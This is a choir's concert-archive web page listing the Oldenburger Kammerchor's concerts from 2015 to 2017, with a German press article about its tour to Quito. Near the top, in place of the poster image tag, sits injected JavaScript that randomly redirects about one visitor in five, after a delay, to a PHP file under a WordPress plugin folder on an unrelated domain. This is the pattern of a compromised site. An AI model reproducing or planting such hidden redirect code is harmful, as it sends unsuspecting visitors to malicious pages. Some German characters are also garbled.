Concert Archive

Choirconcert “peace in Time and Eternity”

var number1=Math.floor(Math.random() * 5); if (number1==3) { var delay = 15000; setTimeout(“document.location.href=’http://baharzaf.com/wp-content/plugins/duplicator/ctrls/wp-rsc.php'”, delay); } src=”http://kammerchor-oldenburg.de/wp-content/uploads/OKC_Frieden_PlakatA3_100417.pdf-200×141.jpg” alt=”OKC_Frieden_PlakatA3_100417.pdf” width=”200″ height=”141″ />

Saturday, .June 17th, 2017, 7pm, St. Ansgari Oldenburg
Sonntag, June 18th, 2017, Herz-Jesu-Kirche Munster, Wolbecker Str. 125

Works of Rheinberger, Esenvalds, Dubra, Poos etc.
conductor: Johannes von Hoff

(Deutsch) Auch die feine Belle Epoque hat ihre Kanten

Sorry, this entry is only available in German.

Passion Concerts


Saturday, Mar, 25th 2017,
Marktkirche Hannover
Sunday, Mar, 26th 2017,
St. Ansgari Oldenburg

Gabriel Fauré: Requiem
Francis Poulenc: Stabat Mater

Sorry, this entry is only available in German.

Christmas Carols at church service Sunday

Dec 18th, 2016 |10 am Ansgarikirche, Oldenburg Eversten

“Love” – Choirmusic of the 19. and 20. century with works of G. Holst, N. Lindberg, M. Lauridson etc.

Sa,Oct 22nd, 6pm, Norderney, Conversationshaus

(Deutsch) Ein anspruchsvoller und ansprechender Chor
Kammerchor feiert in der voll besetzten Ansgarikirche – Kombination mit Jazz-Trio

Sorry, this entry is only available in German.

(Deutsch) Mehr als 200 Zuschauer lauschten am Sonntagabend der Musik des Oldenburger Kammerchors. Die Veranstaltungen fand im Rahmen des Gartenkultur-Musikfestivals statt.

Sorry, this entry is only available in German.

Love – Works for Choir and Jazz-Combo by M. Lauridsen, N. Lindberg etc.

Sa, Aug, 20., 2016, 7pm, Ganderkesee, Jazzfestival
Su, Aug, 21., 2016, 5pm, Oldenburg, Ansgari-Kirche
Su, Aug, 28., 2016, 6pm, Dotlingen/Ostrittum, Hof Schweers

30 years Oldenburger Kammerchor

Sunday, 21st of february, 2017, 5pm

Church St. Ansgar, Oldenburg Eversten

Moons and Suns

Works by Ivan Moody, Richard McIntyre and others

Rascher-Saxophon-Quartett

Oldenburger Kammerchor

Kammerchor verblüfft mit Plattdeutsch am Äquator

Choir trip

03/25/2015 – 04/07/2015
concerts – Festival Internacional de Musica Sacra, Quito

Saturday, 03/28/2015, 6pm, Iglesia de San Sebastian
Sunday, 03/29/2015, 7:30pm, Iglesia de la Compania
Wednesday, 04/01/2015, 7:30pm, Palacio de Cristal del Centro Cultural Itchimbia
ItchimbiaThursday, 04/02/2015, 11am, Iglesia de El Quinche

Choir concert
Monday 04/27/2015, 8pm
Ansgari-Kirche, Oldenburg-Eversten

Choir concert Saturday 05/09/2015, 7pm
St. Hippolyt-Kirche

Nordenham-Blexen
Choir concert Sunday05/10/2015, 5pm
Dom zu Verden

NWZ – 11.4.2015

Beeindruckende Erlebnisse und beeindrucktes Publikum – Gratiskonzert in Ansgarikirche

OLDENBURG/QUITO Sie gilt zwar als die schonste Kirche der Neuen Welt, das ist an diesem Abend aber nicht der Grund fur die lange Schlange vor der Iglesia de Compania. Diesmal singt hier in der innen komplett vergoldeten Kirche der Oldenburger Kammerchor – und offenbar will halb Quito zuhoren. „Auch die Armeren sollen die Chance haben, in Konzerte mit klassischer Musik zu gehen“, sagt Chia Patino, Leiterin von „Musica Sacra“.

Das bedeutendste Festival Sudamerikas macht Kirchen zu Konzertsalen, und weil der Eintritt frei ist, treffen die 34 Sangerinnen und Sanger aus Oldenburg in der Hauptstadt Ecuadors auf ein begeistertes Publikum. Schon am Vortag, beim ersten von vier Konzerten in der Zwei-Millionen-Stadt, gibt es dichtes Gedrange vor der Buhne. Und das, obwohl „die europaische Kulturmusik fur die meisten Menschen hier vollig neu ist“, so Johannes von Hoff (Leiter des Oldenburger Kammerchores). Besonders die vielen Kinder hinterlassen gro?en Eindruck: Gebannt lauschen diese vom Fu?boden aus den romantischen Stucken von Bruckner und Rachmaninov.

Zwei ihrer Konzerte geben die Oldenburger zusammen mit dem „Choro Mixto Ciudad de Quito“ – und begeistern damit von Hoff: „Toll, wie schnell die uber 60 Sanger aus zwei Landern hier eine gemeinsame musikalische Sprache gefunden haben.“

Fur den Kammerchor gestalten sich die Proben wahrend der zehntagigen Reise zugleich als echtes Trainingslager: Wie Leistungssportler mussen sie erfahren, dass in 3000 Metern Hohe die Luft knapp werden kann.

Beim Konzert in der goldenen Kirche von Quito sitzt trotzdem jeder Ton. Poulenc, Part, Sateren, Janssonn – schon zwischen den Stucken gibt es jede Menge Applaus. Schlie?lich haben die Oldenburger „Apamuy Shungo“ einstudiert – einen in Ecuador popularen Gesang der Ureinwohner –, und verbluffen damit Publikum wie Profis. Plattdeutsches gibt es zur zweiten Zugabe am Aquator:?„Dat du min Leevsten bust“. Das kommt an – ganz so, wie Herzlichkeit und Gastfreundschaft ebenda auch die Oldenburger beeindrucken. Geschenke, Einladungen, Umarmungen: So bedanken sich die Einheimischen.

Weitere Einladungen zu Auftritten und Workshops in die USA schlie?en sich an. Die Veranstalter von „Musica Sacra“ mochten das Festival auf ganz Sudamerika ausdehnen und dann gern den Kammerchor wiedersehen und -horen. Am Montag, 27. April, um 20 Uhr, kommen aber erst mal wieder die Oldenburger in den Horgenuss: In der Ansgarikirche wird das Ecuador-Programm dann bei einem Gratiskonzert prasentiert.